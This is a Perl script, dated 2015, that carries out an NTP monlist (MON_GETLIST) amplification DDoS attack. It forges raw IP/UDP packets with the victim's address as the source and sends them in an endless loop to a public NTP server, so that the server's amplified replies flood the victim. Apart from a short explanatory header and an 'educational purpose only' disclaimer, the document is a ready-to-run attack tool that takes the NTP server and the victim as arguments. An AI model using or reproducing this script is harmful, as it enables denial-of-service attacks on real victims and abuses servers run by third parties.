#!/usr/bin/perl##ntp MON_GETLIST query amplification ddos##Copyright 2015 (c) Todor Donev #todor.donev@gmail.com#http://www.ethical-hacker.org/#https://www.facebook.com/ethicalhackerorg##A Network Time Protocol (NTP) Amplification #attack is an emerging form of Distributed #Denial of Service (DDoS) that relies on the #use of publically accessible NTP servers to #overwhelm a victim system with UDP traffic.#The NTP service supports a monitoring service #that allows administrators to query the server #for traffic counts of connected clients. This #information is provided via the “monlist” #command. The basic attack technique consists #of an attacker sending a "get monlist" request #to a vulnerable NTP server, with the source #address spoofed to be the victim’s address. ###Disclaimer:#This or previous program is for Educational#purpose ONLY. Do not use it without permission.#The usual disclaimer applies, especially the#fact that Todor Donev is not liable for any#damages caused by direct or indirect use of the#information or functionality provided by these#programs. The author or any Internet provider#bears NO responsibility for content or misuse#of these programs or any derivatives thereof.#By using these programs you accept the fact#that any damage (dataloss, system crash,#system compromise, etc.) caused by the use#of these programs is not Todor Donev's#responsibility.##Use at your own risk and educational #purpose ONLY!##See also, UDP-based Amplification Attacks:#https://www.us-cert.gov/ncas/alerts/TA14-017A##
use Socket;if( $< != 0 ){
print "Sorry, must be run as root!\n";
print "This script use RAW Socket.\n";exit;}
my $ntpd= (gethostbyname($ARGV[0]))[4];# IP Address Destination(32 bits)
my $victim= (gethostbyname($ARGV[1]))[4];# IP Address Source (32 bits)
print "[ ntpd MON_GETLIST query amplification ]\n";if(!defined $ntpd||!defined $victim){
print "[ Usg: $0 <ntp server> <victim>\n";
print "[ <todor.donev\@gmail.com>Todor Donev ]\n";exit;}
print "[ Sending NTP packets: $ARGV[0] -> $ARGV[1]\n";
socket(RAW, PF_INET, SOCK_RAW, 255) or die $!;
setsockopt(RAW, 0, 1, 1) or die $!;
main();# Main program
sub main {
my $packet;$packet = iphdr();$packet.= udphdr();$packet.= ntphdr();# b000000m...
send_packet($packet);}# IP header (Layer 3)
sub iphdr {
my $ip_ver = 4;# IP Version 4 (4 bits)
my $iphdr_len = 5;# IP Header Length (4 bits)
my $ip_tos = 0;# Differentiated Services (8 bits)
my $ip_total_len = $iphdr_len+ 20;# IP Header Length + Data (16 bits)
my $ip_frag_id = 0;# Identification Field (16 bits)
my $ip_frag_flag = 000;# IP Frag Flags (R DF MF) (3 bits)
my $ip_frag_offset = 0000000000000;# IP Fragment Offset (13 bits)
my $ip_ttl = 255;# IP TTL (8 bits)
my $ip_proto = 17;# IP Protocol (8 bits)
my $ip_checksum = 0;# IP Checksum (16 bits)# IP Packet
my $iphdr = pack('H2 H2 n n B16 h2 c n a4 a4',$ip_ver.$iphdr_len,$ip_tos,$ip_total_len,$ip_frag_id,$ip_frag_flag.$ip_frag_offset,$ip_ttl,$ip_proto,$ip_checksum,$victim,$ntpd);return$iphdr;}# UDP Header (Layer 4)
sub udphdr {
my $udp_src_port = 31337;# UDP Sort Port (16 bits) (0-65535)
my $udp_dst_port = 123;# UDP Dest Port (16 btis) (0-65535)
my $udp_len = 8 + length(ntphdr());# UDP Length (16 bits) (0-65535)
my $udp_checksum = 0;# UDP Checksum (16 bits) (XOR of header)# UDP Packet
my $udphdr = pack('n n n n',$udp_src_port,$udp_dst_port,$udp_len,$udp_checksum);return$udphdr;}# NTP Header (Layer 7)
sub ntphdr {
my $rm_vn_mode = 0x27;# Response bit to 0, More bit to 0, Version field to 2, Mode field to 7## A mode 7 packet is used exchanging data between an NTP server# and a client for purposes other than time synchronization, e.g.# monitoring, statistics gathering and configuration.A mode 7# packet has the following format:##01 2 3#0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+# |R|M| VN| Mode|A|Sequence | Implementation| Req Code|# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+# |Err| Number of data items|MBZ| Size of data item |# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+# | |# |Data (Minimum 0 octets, maximum 500 octets)|# | |# | [...] |# | |# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+# | Encryption Keyid (when A bit set) |# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+# | |# |Message Authentication Code (when A bit set) |# | |# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+## where the fields are (note that the client sends requests, the server# responses):# Response Bit: This packet is a response (if clear, packet is a request).# More Bit: Set for all packets but the last in a response which# requires more than one packet.# Version Number: 2 for current version# Mode: Always 7
my $auth = 0x00;# If set, this packet is authenticated.
my $implementation = 0x03;# Iimplementation: 0x00 (UNIV), 0x02 (XNTPD_OLD), 0x03 (XNTPD)# The number of the implementation this request code# is defined by.An implementation number of zero is used# for requst codes/data formats which all implementations# agree on.Implementation number 255 is reserved (for# extensions, in case we run out).
my $request = 0x2a;# Request code is an implementation-specific code which specifies the# operation to be (which has been) performed and/or the# format and semantics of the data included in the packet # 0x02 (PEER_INFO), 0x03 (PEER_STATS), 0x04 (SYS_INFO),# 0x04 (SYS_STATS), 0x2a (MON_GETLIST) # NTP packet
my $ntphdr = pack('W2 C2 C2 C2',$rm_vn_mode,$auth,$implementation,$request);return$ntphdr;}
sub send_packet {while(1){select(undef, undef, undef, 0.30);# Sleep 300 milliseconds
send(RAW,$_[0], 0, pack('Sna4x8', AF_INET, 60,$ntpd)) or die $!;}}
